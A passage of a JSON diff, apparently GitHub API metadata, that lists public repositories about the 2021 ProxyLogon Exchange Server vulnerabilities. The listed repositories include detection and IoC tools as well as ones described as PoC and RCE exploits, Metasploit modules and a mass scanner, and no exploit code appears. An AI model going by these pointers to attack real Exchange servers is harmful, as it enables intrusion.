+ "name": "exchange-0days-202103",
+ "full_name": "sgnls\/exchange-0days-202103",
+ "owner": {
+ "login": "sgnls",
+ "id": 11134228,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11134228?v=4",
+ "html_url": "https:\/\/github.com\/sgnls"
+ },
+ "html_url": "https:\/\/github.com\/sgnls\/exchange-0days-202103",
+ "description": "IoC determination for exploitation of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.",
+ "fork": false,
+ "created_at": "2021-03-03T14:50:16Z",
+ "updated_at": "2022-11-25T07:49:01Z",
+ "pushed_at": "2021-03-15T11:42:06Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 344210374,
+ "name": "HAFNIUM-IOC",
+ "full_name": "soteria-security\/HAFNIUM-IOC",
+ "owner": {
+ "login": "soteria-security",
+ "id": 49722282,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49722282?v=4",
+ "html_url": "https:\/\/github.com\/soteria-security"
+ },
+ "html_url": "https:\/\/github.com\/soteria-security\/HAFNIUM-IOC",
+ "description": "A PowerShell script to identify indicators of exploitation of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-26865",
+ "fork": false,
+ "created_at": "2021-03-03T17:36:18Z",
+ "updated_at": "2023-08-03T19:21:00Z",
+ "pushed_at": "2021-03-05T17:09:01Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 344742582,
+ "name": "exchange_webshell_detection",
+ "full_name": "cert-lv\/exchange_webshell_detection",
+ "owner": {
+ "login": "cert-lv",
+ "id": 22764485,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22764485?v=4",
+ "html_url": "https:\/\/github.com\/cert-lv"
+ },
+ "html_url": "https:\/\/github.com\/cert-lv\/exchange_webshell_detection",
+ "description": "Detect webshells dropped on Microsoft Exchange servers exploited through \"proxylogon\" group of vulnerabilites (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)",
+ "fork": false,
+ "created_at": "2021-03-05T08:22:07Z",
+ "updated_at": "2024-05-02T11:59:34Z",
+ "pushed_at": "2021-03-16T08:34:14Z",
+ "stargazers_count": 97,
+ "watchers_count": 97,
+ "has_discussions": false,
+ "forks_count": 21,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "blueteam",
+ "exchange-server",
+ "infosec",
+ "iocs",
+ "security",
+ "security-audit"
+ ],
+ "visibility": "public",
+ "forks": 21,
+ "watchers": 97,
+ "score": 0,
+ "subscribers_count": 14
+ },
+ {
+ "id": 345052378,
+ "name": "Microsoft_Exchange_Server_SSRF_CVE-2021-26855",
+ "full_name": "conjojo\/Microsoft_Exchange_Server_SSRF_CVE-2021-26855",
+ "owner": {
+ "login": "conjojo",
+ "id": 79626719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79626719?v=4",
+ "html_url": "https:\/\/github.com\/conjojo"
+ },
+ "html_url": "https:\/\/github.com\/conjojo\/Microsoft_Exchange_Server_SSRF_CVE-2021-26855",
+ "description": "Microsoft Exchange Server SSRF漏洞(CVE-2021-26855)",
+ "fork": false,
+ "created_at": "2021-03-06T09:15:55Z",
+ "updated_at": "2022-11-12T08:35:22Z",
+ "pushed_at": "2021-03-06T10:34:49Z",
+ "stargazers_count": 37,
+ "watchers_count": 37,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 37,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 345173055,
+ "name": "CVE-2021-26855-SSRF",
+ "full_name": "pussycat0x\/CVE-2021-26855-SSRF",
+ "owner": {
+ "login": "pussycat0x",
+ "id": 65701233,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65701233?v=4",
+ "html_url": "https:\/\/github.com\/pussycat0x"
+ },
+ "html_url": "https:\/\/github.com\/pussycat0x\/CVE-2021-26855-SSRF",
+ "description": "This script helps to identify CVE-2021-26855 ssrf Poc",
+ "fork": false,
+ "created_at": "2021-03-06T19:03:00Z",
+ "updated_at": "2023-09-28T11:25:33Z",
+ "pushed_at": "2021-03-10T07:41:56Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-26855-ssrf",
+ "microsoft-exchange",
+ "poc",
+ "proxylogon",
+ "ssrf"
+ ],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 345228496,
+ "name": "CVE-2021-26855-SSRF-Exchange",
+ "full_name": "La3B0z\/CVE-2021-26855-SSRF-Exchange",
+ "owner": {
+ "login": "La3B0z",
+ "id": 10507748,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10507748?v=4",
+ "html_url": "https:\/\/github.com\/La3B0z"
+ },
+ "html_url": "https:\/\/github.com\/La3B0z\/CVE-2021-26855-SSRF-Exchange",
+ "description": "CVE-2021-26855 SSRF Exchange Server",
+ "fork": false,
+ "created_at": "2021-03-07T00:55:16Z",
+ "updated_at": "2022-11-09T18:11:26Z",
+ "pushed_at": "2021-03-06T18:57:43Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 345337490,
+ "name": "exchange_proxylogon",
+ "full_name": "mekhalleh\/exchange_proxylogon",
+ "owner": {
+ "login": "mekhalleh",
+ "id": 5225129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5225129?v=4",
+ "html_url": "https:\/\/github.com\/mekhalleh"
+ },
+ "html_url": "https:\/\/github.com\/mekhalleh\/exchange_proxylogon",
+ "description": "Module pack for #ProxyLogon (part. of my contribute for Metasploit-Framework) [CVE-2021-26855 && CVE-2021-27065]",
+ "fork": false,
+ "created_at": "2021-03-07T12:12:16Z",
+ "updated_at": "2021-09-12T03:30:10Z",
+ "pushed_at": "2021-03-29T08:42:01Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 345567206,
+ "name": "CVE-2021-26855_SSRF",
+ "full_name": "Yt1g3r\/CVE-2021-26855_SSRF",
+ "owner": {
+ "login": "Yt1g3r",
+ "id": 12625147,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12625147?v=4",
+ "html_url": "https:\/\/github.com\/Yt1g3r"
+ },
+ "html_url": "https:\/\/github.com\/Yt1g3r\/CVE-2021-26855_SSRF",
+ "description": "POC of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-26865, ProxyLogon poc",
+ "fork": false,
+ "created_at": "2021-03-08T07:28:21Z",
+ "updated_at": "2023-09-28T11:25:36Z",
+ "pushed_at": "2021-03-11T03:28:47Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-26855",
+ "proxylogon"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 345595529,
+ "name": "CVE-2021-26855",
+ "full_name": "hackerxj007\/CVE-2021-26855",
+ "owner": {
+ "login": "hackerxj007",
+ "id": 23031720,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23031720?v=4",
+ "html_url": "https:\/\/github.com\/hackerxj007"
+ },
+ "html_url": "https:\/\/github.com\/hackerxj007\/CVE-2021-26855",
+ "description": "CVE-2021-26855 exp",
+ "fork": false,
+ "created_at": "2021-03-08T09:12:27Z",
+ "updated_at": "2024-04-17T21:48:53Z",
+ "pushed_at": "2021-03-08T08:09:01Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 73,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 73,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 345639477,
+ "name": "proxylogscan",
+ "full_name": "dwisiswant0\/proxylogscan",
+ "owner": {
+ "login": "dwisiswant0",
+ "id": 25837540,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25837540?v=4",
+ "html_url": "https:\/\/github.com\/dwisiswant0"
+ },
+ "html_url": "https:\/\/github.com\/dwisiswant0\/proxylogscan",
+ "description": "A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855).",
+ "fork": false,
+ "created_at": "2021-03-08T11:54:32Z",
+ "updated_at": "2024-06-02T15:59:55Z",
+ "pushed_at": "2022-03-02T15:41:29Z",
+ "stargazers_count": 155,
+ "watchers_count": 155,
+ "has_discussions": false,
+ "forks_count": 23,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-26855",
+ "cve-2021-27065",
+ "microsoft-exchange",
+ "microsoft-exchange-proxylogon",
+ "microsoft-exchange-server",
+ "proxylogon",
+ "ssrf"
+ ],
+ "visibility": "public",
+ "forks": 23,
+ "watchers": 155,
+ "score": 0,
+ "subscribers_count": 9
+ },
+ {
+ "id": 345955330,
+ "name": "ExchangeWeaknessTest",
+ "full_name": "mauricelambert\/ExchangeWeaknessTest",
+ "owner": {
+ "login": "mauricelambert",
+ "id": 50479118,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4",
+ "html_url": "https:\/\/github.com\/mauricelambert"
+ },
+ "html_url": "https:\/\/github.com\/mauricelambert\/ExchangeWeaknessTest",
+ "description": "This script test the CVE-2021-26855 vulnerability on Exchange Server.",
+ "fork": false,
+ "created_at": "2021-03-09T09:40:29Z",
+ "updated_at": "2021-03-09T09:43:55Z",
+ "pushed_at": "2021-03-09T09:42:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "exchange",
+ "microsoft",
+ "python3",
+ "security",
+ "security-tools"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 345970212,
+ "name": "Exchange_IOC_Hunter",
+ "full_name": "DCScoder\/Exchange_IOC_Hunter",
+ "owner": {
+ "login": "DCScoder",
+ "id": 42096735,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42096735?v=4",
+ "html_url": "https:\/\/github.com\/DCScoder"
+ },
+ "html_url": "https:\/\/github.com\/DCScoder\/Exchange_IOC_Hunter",
+ "description": "CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065",
+ "fork": false,
+ "created_at": "2021-03-09T10:36:44Z",
+ "updated_at": "2021-03-17T10:22:07Z",
+ "pushed_at": "2021-03-17T10:22:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 346033440,
+ "name": "CVE-2021-26855-PoC",
+ "full_name": "srvaccount\/CVE-2021-26855-PoC",
+ "owner": {
+ "login": "srvaccount",
+ "id": 76211832,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76211832?v=4",
+ "html_url": "https:\/\/github.com\/srvaccount"
+ },
+ "html_url": "https:\/\/github.com\/srvaccount\/CVE-2021-26855-PoC",
+ "description": "PoC exploit code for CVE-2021-26855",
+ "fork": false,
+ "created_at": "2021-03-09T14:27:06Z",
+ "updated_at": "2023-08-09T18:23:58Z",
+ "pushed_at": "2021-03-09T21:59:53Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 20,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 20,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 346078570,
+ "name": "CVE-2021-26855",
+ "full_name": "h4x0r-dz\/CVE-2021-26855",
+ "owner": {
+ "login": "h4x0r-dz",
+ "id": 26070859,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4",
+ "html_url": "https:\/\/github.com\/h4x0r-dz"
+ },
+ "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2021-26855",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-09T16:54:39Z",
+ "updated_at": "2023-11-13T16:25:49Z",
+ "pushed_at": "2021-03-09T16:56:09Z",
+ "stargazers_count": 99,
+ "watchers_count": 99,
+ "has_discussions": false,
+ "forks_count": 61,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 61,
+ "watchers": 99,
+ "score": 0,
+ "subscribers_count": 13
+ },
+ {
+ "id": 346241102,
+ "name": "CVE-2021-26855_PoC",
+ "full_name": "alt3kx\/CVE-2021-26855_PoC",
+ "owner": {
+ "login": "alt3kx",
+ "id": 3140111,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4",
+ "html_url": "https:\/\/github.com\/alt3kx"
+ },
+ "html_url": "https:\/\/github.com\/alt3kx\/CVE-2021-26855_PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-10T05:21:19Z",
+ "updated_at": "2023-09-28T11:25:39Z",
+ "pushed_at": "2021-03-12T16:19:50Z",
+ "stargazers_count": 53,
+ "watchers_count": 53,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 53,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 346816198,
+ "name": "CVE-2021-26855",
+ "full_name": "raheel0x01\/CVE-2021-26855",
+ "owner": {
+ "login": "raheel0x01",
+ "id": 65211256,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65211256?v=4",
+ "html_url": "https:\/\/github.com\/raheel0x01"
+ },
+ "html_url": "https:\/\/github.com\/raheel0x01\/CVE-2021-26855",
+ "description": " CVE-2021-26855, also known as Proxylogon, is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server.",
+ "fork": false,
+ "created_at": "2021-03-11T19:35:35Z",
+ "updated_at": "2024-01-01T17:05:07Z",
+ "pushed_at": "2024-01-01T17:04:45Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 346834084,
+ "name": "CVE-2021-26855",
+ "full_name": "hackerschoice\/CVE-2021-26855",
+ "owner": {
+ "login": "hackerschoice",
+ "id": 57636453,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57636453?v=4",
+ "html_url": "https:\/\/github.com\/hackerschoice"
+ },
+ "html_url": "https:\/\/github.com\/hackerschoice\/CVE-2021-26855",
+ "description": "PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github",
+ "fork": false,
+ "created_at": "2021-03-11T20:51:48Z",
+ "updated_at": "2024-04-28T10:49:21Z",
+ "pushed_at": "2021-03-11T20:58:08Z",
+ "stargazers_count": 62,
+ "watchers_count": 62,
+ "has_discussions": false,
+ "forks_count": 34,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 34,
+ "watchers": 62,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 346840803,
+ "name": "HAFNIUM-Microsoft-Exchange-0day",
+ "full_name": "SCS-Labs\/HAFNIUM-Microsoft-Exchange-0day",
+ "owner": {
+ "login": "SCS-Labs",
+ "id": 67705746,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67705746?v=4",
+ "html_url": "https:\/\/github.com\/SCS-Labs"
+ },
+ "html_url": "https:\/\/github.com\/SCS-Labs\/HAFNIUM-Microsoft-Exchange-0day",
+ "description": "CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065",
+ "fork": false,
+ "created_at": "2021-03-11T21:18:29Z",
+ "updated_at": "2021-04-19T19:31:47Z",
+ "pushed_at": "2021-04-19T19:31:45Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": true,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0day",
+ "agency-security",
+ "cve-2021-26855",
+ "cve-2021-26857",
+ "cve-2021-26858",
+ "cve-2021-27065",
+ "detections",
+ "microsoft-exchange",
+ "microsoft-exchange-server",
+ "mitigations",
+ "proxylogon",
+ "timeline",
+ "tweets",
+ "zeroday"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 347064151,
+ "name": "CVE-2021-26855-Scanner",
+ "full_name": "KotSec\/CVE-2021-26855-Scanner",
+ "owner": {
+ "login": "KotSec",
+ "id": 80525807,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80525807?v=4",
+ "html_url": "https:\/\/github.com\/KotSec"
+ },
+ "html_url": "https:\/\/github.com\/KotSec\/CVE-2021-26855-Scanner",
+ "description": "Scanner and PoC for CVE-2021-26855 ",
+ "fork": false,
+ "created_at": "2021-03-12T12:47:41Z",
+ "updated_at": "2023-08-21T15:37:11Z",
+ "pushed_at": "2021-03-12T12:55:57Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 347638787,
+ "name": "proxylogon",
+ "full_name": "hakivvi\/proxylogon",
+ "owner": {
+ "login": "hakivvi",
+ "id": 67718634,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67718634?v=4",
+ "html_url": "https:\/\/github.com\/hakivvi"
+ },
+ "html_url": "https:\/\/github.com\/hakivvi\/proxylogon",
+ "description": "RCE exploit for Microsoft Exchange Server (CVE-2021-26855).",
+ "fork": false,
+ "created_at": "2021-03-14T13:04:07Z",
+ "updated_at": "2023-06-16T16:27:28Z",
+ "pushed_at": "2022-04-23T03:21:44Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-26855"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 347658157,
+ "name": "Exch-CVE-2021-26855",
+ "full_name": "ZephrFish\/Exch-CVE-2021-26855",
+ "owner": {
+ "login": "ZephrFish",
+ "id": 5783068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4",
+ "html_url": "https:\/\/github.com\/ZephrFish"
+ },
+ "html_url": "https:\/\/github.com\/ZephrFish\/Exch-CVE-2021-26855",
+ "description": "CVE-2021-26855: PoC (Not a HoneyPoC for once!)",
+ "fork": false,
+ "created_at": "2021-03-14T14:23:34Z",
+ "updated_at": "2024-01-22T05:20:43Z",
+ "pushed_at": "2021-03-15T18:56:38Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 347774757,
+ "name": "ProxyLogon-CVE-2021-26855",
+ "full_name": "mil1200\/ProxyLogon-CVE-2021-26855",
+ "owner": {
+ "login": "mil1200",
+ "id": 18125445,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18125445?v=4",
+ "html_url": "https:\/\/github.com\/mil1200"
+ },
+ "html_url": "https:\/\/github.com\/mil1200\/ProxyLogon-CVE-2021-26855",
+ "description": "RCE exploit for ProxyLogon vulnerability in Microsoft Exchange",
+ "fork": false,
+ "created_at": "2021-03-14T22:57:21Z",
+ "updated_at": "2023-09-28T11:25:47Z",
+ "pushed_at": "2021-03-14T23:03:12Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 347900434,
+ "name": "ExchangeSSRFtoRCEExploit",
+ "full_name": "evilashz\/ExchangeSSRFtoRCEExploit",
+ "owner": {
+ "login": "evilashz",
+ "id": 50722929,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50722929?v=4",
+ "html_url": "https:\/\/github.com\/evilashz"
+ },
+ "html_url": "https:\/\/github.com\/evilashz\/ExchangeSSRFtoRCEExploit",
+ "description": "CVE-2021-26855 & CVE-2021-27065",
+ "fork": false,
+ "created_at": "2021-03-15T09:02:40Z",
+ "updated_at": "2024-06-21T00:09:11Z",
+ "pushed_at": "2021-03-15T09:19:45Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-26855",
+ "cve-2021-27065",
+ "proxylogon"
+ ],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 347961970,
+ "name": "Exch-CVE-2021-26855_Priv",
+ "full_name": "ZephrFish\/Exch-CVE-2021-26855_Priv",
+ "owner": {
+ "login": "ZephrFish",
+ "id": 5783068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4",
+ "html_url": "https:\/\/github.com\/ZephrFish"
+ },
+ "html_url": "https:\/\/github.com\/ZephrFish\/Exch-CVE-2021-26855_Priv",
+ "description": "patched to work",
+ "fork": false,
+ "created_at": "2021-03-15T12:33:04Z",
+ "updated_at": "2023-03-01T05:35:13Z",
+ "pushed_at": "2022-10-08T02:30:28Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 347992754,
+ "name": "CVE-2021-26855-d",
+ "full_name": "Mr-xn\/CVE-2021-26855-d",
+ "owner": {
+ "login": "Mr-xn",
+ "id": 18260135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4",
+ "html_url": "https:\/\/github.com\/Mr-xn"
+ },
+ "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2021-26855-d",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-15T14:03:16Z",
+ "updated_at": "2023-09-28T11:25:48Z",
+ "pushed_at": "2021-03-15T14:08:16Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 348253285,
+ "name": "ProxyLogon",
+ "full_name": "RickGeex\/ProxyLogon",
+ "owner": {
+ "login": "RickGeex",
+ "id": 7975904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7975904?v=4",
+ "html_url": "https:\/\/github.com\/RickGeex"
+ },
+ "html_url": "https:\/\/github.com\/RickGeex\/ProxyLogon",
+ "description": "ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution.",
+ "fork": false,
+ "created_at": "2021-03-16T07:31:25Z",
+ "updated_at": "2024-05-07T20:37:46Z",
+ "pushed_at": "2021-05-01T17:20:15Z",
+ "stargazers_count": 30,
+ "watchers_count": 30,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 30,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 348300485,
+ "name": "ProxyLogon",
+ "full_name": "Immersive-Labs-Sec\/ProxyLogon",
+ "owner": {
+ "login": "Immersive-Labs-Sec",
+ "id": 79456607,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79456607?v=4",
+ "html_url": "https:\/\/github.com\/Immersive-Labs-Sec"
+ },
+ "html_url": "https:\/\/github.com\/Immersive-Labs-Sec\/ProxyLogon",
+ "description": "Chaining CVE-2021-26855 and CVE-2021-26857 to exploit Microsoft Exchange",
+ "fork": false,
+ "created_at": "2021-03-16T10:14:56Z",
+ "updated_at": "2021-03-24T16:54:40Z",
+ "pushed_at": "2021-03-22T09:22:20Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 348408422,
+ "name": "Scan-Vuln-CVE-2021-26855",
+ "full_name": "shacojx\/Scan-Vuln-CVE-2021-26855",
+ "owner": {
+ "login": "shacojx",
+ "id": 19655109,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19655109?v=4",
+ "html_url": "https:\/\/github.com\/shacojx"
+ },
+ "html_url": "https:\/\/github.com\/shacojx\/Scan-Vuln-CVE-2021-26855",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-16T15:59:17Z",
+ "updated_at": "2023-09-28T11:25:50Z",
+ "pushed_at": "2021-03-18T10:52:00Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 348568793,
+ "name": "ProxyLogon-CVE-2021-26855-metasploit",
+ "full_name": "TaroballzChen\/ProxyLogon-CVE-2021-26855-metasploit",
+ "owner": {
+ "login": "TaroballzChen",
+ "id": 27862593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4",
+ "html_url": "https:\/\/github.com\/TaroballzChen"
+ },
+ "html_url": "https:\/\/github.com\/TaroballzChen\/ProxyLogon-CVE-2021-26855-metasploit",
+ "description": "CVE-2021-26855 proxyLogon metasploit exploit script",
+ "fork": false,
+ "created_at": "2021-03-17T03:32:19Z",
+ "updated_at": "2023-10-23T17:23:35Z",
+ "pushed_at": "2021-03-17T05:51:30Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-26855",
+ "metasploit",
+ "proxylogon"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 348573564,
+ "name": "ProxyLogon",
+ "full_name": "p0wershe11\/ProxyLogon",
+ "owner": {
